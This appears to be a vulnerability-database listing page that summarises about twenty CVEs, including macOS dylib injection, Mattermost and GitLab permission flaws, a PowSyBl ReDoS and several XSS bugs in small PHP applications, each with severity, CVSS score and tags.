A command injection vulnerability was discovered in the TrustyAI Explainability toolkit.
Command Injection
Redhat
-
CVE-2025-5963
MEDIUM
CVSS 4.8
The Postbox's configuration on macOS, specifically the presence of entitlements: "com.apple.security.cs.allow-dyld-environment-variables" and "com.apple.security.cs.disable-library-validation" allows for Dynamic Library (Dylib) injection. A local attacker with unprivileged access can use environment variables like DYLD_INSERT_LIBRARIES to successfully inject code in the application's context and bypass Transparency, Consent, and Control (TCC). Acquired resource access is limited to permissions previously granted by the user. Access to other resources beyond granted permissions requires user interaction with a system prompt asking for permission.
The original company behind Postbox is no longer operational; the software will no longer receive updates. The acquiring company (em Client) did not cooperate in vulnerability disclosure.
Apple
Privilege Escalation
macOS
-
CVE-2025-5255
MEDIUM
CVSS 4.8
The Phoenix Code's configuration on macOS, specifically the presence of entitlements: "com.apple.security.cs.allow-dyld-environment-variables" and "com.apple.security.cs.disable-library-validation" allows for Dynamic Library (Dylib) injection. A local attacker with unprivileged access can use environment variables like DYLD_INSERT_LIBRARIES to successfully inject code in the application's context and bypass Transparency, Consent, and Control (TCC). Acquired resource access is limited to permissions previously granted by the user. Access to other resources beyond granted permissions requires user interaction with a system prompt asking for permission.
This issue was fixed in commit 0c75fb57f89d0b7d9b180026bc2624b7dcf807da.
Apple
Privilege Escalation
macOS
-
CVE-2025-5125
MEDIUM
CVSS 4.8
The Custom Post Carousels with Owl WordPress plugin before 1.4.12 uses the featherlight library and makes use of the data-featherlight attribute without sanitizing before using it.
WordPress
XSS
Custom Post Carousels With Owl
PHP
-
CVE-2025-3228
MEDIUM
CVSS 4.3
Mattermost versions 10.5.x <= 10.5.5, 9.11.x <= 9.11.15, 10.8.x <= 10.8.0, 10.7.x <= 10.7.2, 10.6.x <= 10.6.5 fail to properly retrieve requestorInfo from playbooks handler for guest users which allows an attacker access to the playbook run.
Authentication Bypass
Debian
Mattermost Server
Suse
-
CVE-2025-3227
MEDIUM
CVSS 4.3
Mattermost versions 10.5.x <= 10.5.5, 9.11.x <= 9.11.15, 10.8.x <= 10.8.0, 10.7.x <= 10.7.2, 10.6.x <= 10.6.5 fail to properly enforce channel member management permissions in playbook runs, allowing authenticated users without the 'Manage Channel Members' permission to add or remove users from public and private channels by manipulating playbook run participants when the run is linked to a channel.
Authentication Bypass
Debian
Mattermost Server
Suse
-
CVE-2024-7586
MEDIUM
CVSS 4.1
An issue was discovered in GitLab EE affecting all versions starting from 17.0 prior to 17.0.6, starting from 17.1 prior to 17.1.4, and starting from 17.2 prior to 17.2.2, where webhook deletion audit log preserved auth credentials.
Gitlab
Information Disclosure
Ubuntu
Debian
-
CVE-2024-4025
MEDIUM
CVSS 6.5
A Denial of Service (DoS) condition has been discovered in GitLab CE/EE affecting all versions from 7.10 before 16.11.5, version 17.0 before 17.0.3, and 17.1 before 17.1.1. It is possible for an attacker to cause a denial of service using a crafted markdown page.
Gitlab
Denial Of Service
Ubuntu
Debian
-
CVE-2025-52484
LOW
CVSS 2.7
A security vulnerability in RISC Zero (CVSS 2.7). Remediation should follow standard vulnerability management procedures.
Information Disclosure
-
CVE-2025-48059
LOW
CVSS 2.7
PowSyBl (Power System Blocks) is a framework to build power system oriented software. In com.powsybl:powsybl-iidm-criteria versions 6.3.0 to before 6.7.2 and com.powsybl:powsybl-contingency-api versions 5.0.0 to before 6.3.0, there is a potential polynomial Regular Expression Denial of Service (ReDoS) vulnerability in the RegexCriterion class. This class compiles and evaluates an unvalidated, user-supplied regular expression against the identifier of an Identifiable object via Pattern.compile(regex).matcher(id).find(). If successfully exploited, a malicious actor can cause significant CPU exhaustion through repeated or recursive filter(...) calls, especially if performed over large network models or filtering operations. This issue has been patched in com.powsybl:powsybl-iidm-criteria 6.7.2.
Denial Of Service
-
CVE-2025-6353
LOW
CVSS 3.5
A vulnerability classified as problematic was found in code-projects Responsive Blog 1.0. Affected by this vulnerability is an unknown functionality of the file /search.php. The manipulation of the argument keyword leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
PHP
XSS
-
CVE-2025-6347
LOW
CVSS 2.4
A vulnerability was found in code-projects Responsive Blog 1.0/1.12.4/3.3.4. It has been declared as problematic. This vulnerability affects unknown code of the file /responsive/resblog/blogadmin/admin/pageViewMembers.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
PHP
XSS
-
CVE-2025-6345
LOW
CVSS 3.5
A vulnerability was found in SourceCodester My Food Recipe 1.0 and classified as problematic. Affected by this issue is the function addRecipeModal of the file /endpoint/add-recipe.php of the component Add Recipe Page. The manipulation of the argument Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
PHP
XSS
-
CVE-2025-6340
LOW
CVSS 3.5
A vulnerability classified as problematic has been found in code-projects School Fees Payment System 1.0. This affects an unknown part of the file /branch.php. The manipulation of the argument Branch/Address/Detail leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
PHP
XSS
-
CVE-2025-6301
LOW
CVSS 2.4
A vulnerability, which was classified as problematic, has been found in PHPGurukul Notice Board System 1.0. This issue affects some unknown processing of the file /admin/manage-notices.php of the component Add Notice. The manipulation of the argument Title/Description leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
PHP
XSS
-
CVE-2025-6288
LOW
CVSS 2.4
A vulnerability, which was classified as problematic, has been found in PHPGurukul Bus Pass Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/admin-profile.php of the component Profile Page. The manipulation of the argument profile name leads to cross site scripting. The attack may be launched remotely.
PHP
XSS
-
CVE-2025-6287
LOW
CVSS 3.5
A vulnerability classified as problematic was found in PHPGurukul COVID19 Testing Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /test-details.php of the component Take Action. The manipulation of the argument remark leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
PHP
XSS
-
CVE-2025-5416
LOW
CVSS 2.7
A vulnerability has been identified in Keycloak that could lead to unauthorized information disclosure. While it requires an already authenticated user, the /admin/serverinfo endpoint can inadvertently provide sensitive environment information.
Information Disclosure
Debian
-
CVE-2023-5600
LOW
CVSS 3.1
An issue has been discovered in GitLab EE affecting all versions starting from 16.0 before 16.3.6, all versions starting from 16.4 before 16.4.2, all versions starting from 16.5 before 16.5.1. Arbitrary access to the titles of private specific references could be leaked through the service-desk custom email template.
Gitlab
Authentication Bypass
Debian